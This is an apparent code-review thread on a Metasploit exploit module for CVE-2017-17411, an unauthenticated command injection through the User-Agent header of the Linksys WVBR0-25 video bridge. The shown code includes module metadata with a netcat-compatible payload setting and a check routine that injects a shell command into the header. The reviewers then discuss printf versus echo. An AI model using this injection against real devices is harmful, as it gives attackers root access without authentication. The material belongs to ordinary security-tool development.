modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb

```diff
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Linksys WVBR0-25 User-Agent Command Execution',
+      'Description' => %q{
+        The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie
+        cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41
+        of the web management portal via the User-Agent header. Authentication is not required to
+        exploit this vulnerability.
+      },
+      'Author'      =>
+        [
+          'HeadlessZeke' # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2017-17411'],
+          ['ZDI', '17-973'],
+          ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
+        ],
+      'DisclosureDate' => 'Dec 13 2017',
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat'
+            }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    check_str = rand_text_alpha(8)
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => '/',
+        'agent' => "\"; printf \"#{check_str}"
```

Comment:
`echo <string> == printf <"string" + "\n" >`. 

- **echo** may be more stable.

Reply:
I thought printf was the more reliable of the two. I used it so I wouldn’t have to deal with any newlines being fed to the md5sum along with the string, but I can change it if desired.

Reply:
Since this is a device and not Joe Bob's random PHP app, and you have the device, you can check. It's probably BusyBox. If it has both, use either.

Reply:
Oh yeah, it definitely has both. I think I’m just gonna leave it as is for simplicity.